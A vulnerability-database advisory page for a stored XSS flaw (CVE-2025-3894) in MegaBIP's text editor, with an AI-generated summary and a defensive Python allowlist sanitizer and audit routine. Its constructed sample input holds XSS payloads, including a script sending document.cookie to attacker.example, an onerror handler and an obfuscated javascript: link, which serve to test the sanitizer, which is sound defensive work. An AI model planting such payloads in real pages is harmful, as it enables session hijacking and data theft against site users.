VYPR
Medium severity · NVD Advisory · Published May 23, 2025 · Updated Apr 15, 2026

CVE-2025-3894

Description

The text editor embedded in MegaBIP does not neutralize user input, allowing stored XSS attacks on other users. High privileges are required to use the editor. Version 5.20 of MegaBIP fixes this issue.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

MegaBIP 5.19 and earlier contain a stored XSS vulnerability in the embedded text editor, allowing a high-privileged user to run script in the browsers of other users of the site.

CVE-2025-3894 describes a stored cross-site scripting (XSS) vulnerability in the text editor embedded in the MegaBIP software. The editor fails to neutralize user-supplied input before it is used in web page generation (CWE-79). All versions of MegaBIP through 5.19 are affected [1].

Exploitation requires high privileges: the attacker must already hold a privileged account (for example an editor or administrator role) in the application, or have obtained one. Through the text editor they can save content carrying a script, which is stored and later served to other users when they view the affected page. Once the attacker has those privileges, no authentication bypass or access beyond the standard web interface is needed [1]. Note that the privilege requirement limits who can plant the payload, not who is exposed to it: any user who views the stored content is a potential victim.

The impact is execution of attacker-controlled JavaScript in the browsers of other users, which can lead to session hijacking, data theft, or actions performed with the victim's privileges inside the application. Stored XSS is particularly dangerous because the payload persists in the application's data and can affect many victims over time without further interaction from the attacker [1].

MegaBIP version 5.20 has been released to fix this issue [1]. Additionally, the Polish government's cybersecurity authority has issued a recommendation urging entities of the national cybersecurity system to stop using MegaBIP entirely due to multiple critical vulnerabilities, including this one [2]. Administrators are advised to upgrade to the latest version or migrate to an alternative BIP platform as recommended by the authorities [2].
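The pattern the advisory describes is editor HTML that is stored and later rendered as saved; the fix is to neutralize it server-side before it is stored (or at render time), and an upgrade alone does not tell you whether content saved earlier already carries a payload. As an added example, not MegaBIP's own code (its editor, storage layer and templates are not on this page), the Python below implements an allowlist sanitizer over the standard-library HTML parser and reuses the same pass to audit already-stored content for active constructs. The tag/attribute allowlist, the function names and the `STORED_PAGE` sample are assumptions made for the example.

```python
"""Allowlist sanitiser for rich-text editor output, reused to audit pages stored
before a fix.  Added example, not MegaBIP code: its editor and storage layer are
not on this page, so the HTML below is constructed and the allowlist is assumed."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist: structure, inline formatting, links and images.  Everything
# else (script, iframe, svg, form, style and on* attributes, ...) is dropped.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li", "h1",
                "h2", "h3", "h4", "table", "thead", "tbody", "tr", "th", "td", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS, VOID_TAGS = {"href", "src"}, {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript",
                     "template", "textarea"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(value: str) -> bool:
    """Relative URLs and http/https/mailto only; whitespace and control characters
    are stripped first so 'jav\\tascript:' and '\\x01javascript:' are still caught."""
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace())
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return False
    return scheme == "" or scheme in SAFE_SCHEMES


class _Sanitizer(HTMLParser):
    """Re-serialises allowed tags/attributes only; text is re-escaped, comments dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.stack, self.findings = [], [], []
        self.skip_tag = None                        # set while inside <script> etc.

    def handle_starttag(self, tag, attrs):
        if self.skip_tag:
            return
        if tag in DROP_WITH_CONTENT:                # element and its content go
            self.findings.append(f"<{tag}> element")
            self.skip_tag = tag
            return
        kept = []
        for name, value in attrs:                   # parser lowercases names and
            value = value or ""                     # decodes entities in values
            if name.startswith("on"):
                self.findings.append(f"<{tag} {name}> event handler")
            elif name in URL_ATTRS and not safe_url(value):
                self.findings.append(f"<{tag} {name}> unsafe URL scheme")
            elif name in ALLOWED_ATTRS.get(tag, ()):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag not in ALLOWED_TAGS:                 # unwrap: escaped text only
            return
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if self.skip_tag:
            if tag == self.skip_tag:
                self.skip_tag = None
            return
        while tag in self.stack:                    # close mis-nested tags in order
            top = self.stack.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_tag:
            self.out.append(escape(data, quote=False))


def _run(fragment: str):
    s = _Sanitizer()
    s.feed(fragment)
    s.close()
    s.out.extend(f"</{t}>" for t in reversed(s.stack))   # close what was left open
    return "".join(s.out), s.findings


def sanitize_editor_html(fragment: str) -> str:
    """Server-side neutralisation of editor output before it is stored."""
    return _run(fragment)[0]


def audit_stored_html(fragment: str) -> list:
    """Active content in an already-stored fragment (a sweep for pages saved pre-fix)."""
    return _run(fragment)[1]


# Constructed sample of what a privileged user could save through an unsanitised editor.
STORED_PAGE = ('<p>Godziny pracy: <b>8-16</b></p>'
               '<script>fetch("//attacker.example/?c=" + document.cookie)</script>'
               '<img src=x onerror="alert(document.domain)">'
               '<a href="jav&#x09;ascript:alert(1)">Kontakt</a>')
```

Running `audit_stored_html(STORED_PAGE)` reports the `<script>` element, the `onerror` handler on the image and the tab-obfuscated `javascript:` link; `sanitize_editor_html(STORED_PAGE)` keeps only `<p>Godziny pracy: <b>8-16</b></p><img src="x"><a>Kontakt</a>`. Two design points matter here: the allowlist rejects everything it does not recognise, so new attributes or tags cannot slip through, and URL attributes are checked after entity decoding and whitespace stripping, because the browser applies both before it interprets the scheme. Sanitising at write time still belongs alongside output encoding in templates and a Content-Security-Policy as defence in depth, and the audit pass exists because content saved under a vulnerable version is served as it was saved until someone re-saves or cleans it.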

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)


References: 3

News mentions: 0 (no linked articles in the index yet)